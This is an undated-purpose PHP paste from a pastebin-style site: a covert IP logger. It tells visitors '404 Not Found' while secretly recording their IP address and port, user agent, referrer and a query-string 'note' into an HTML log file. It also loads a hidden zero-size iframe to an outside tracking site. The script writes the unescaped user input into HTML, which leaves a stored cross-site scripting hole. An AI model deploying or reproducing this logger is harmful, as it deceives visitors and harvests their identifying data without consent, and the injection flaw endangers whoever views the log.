Untitled
By: a guest | Mar 19th, 2010 | Syntax:
None | Size: 0.84 KB | Hits: 192 | Expires: Never
<?php
echo "404 Not Found";
#Initial Loading Code
$file = fopen("out.html" , "a");
#Time Stamp
$time = date("H:i dS F");
fwrite($file,"Time: $time <br>");
#Note
$note = $_GET['note'];
fwrite($file,"Note: $note <br>");
#Website Referal
$ref = $_SERVER['HTTP_REFERER'];
fwrite($file,"Referal: $ref <br>");
#User Agent
$agent = $_SERVER['HTTP_USER_AGENT'];
fwrite($file,"User Agent: $agent <br>");
#IP Adress
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['REMOTE_PORT'];
fwrite($file,"IP Adress: $ip:$port <br>");
#Have Your Friends Been There
$hyfbt="wfxl";
echo "<iframe src=http://www.hyfbt.com/$hyfbt width='0' height='0' border=0 style='display:none;width:0px; height:0px; border: 0px;'>";
fwrite($file,"HYFBT Link: http://www.haveyourfriendsbeenthere.com/?id=$hyfbt <br>");
#End File
fwrite($file,"<br>");
?>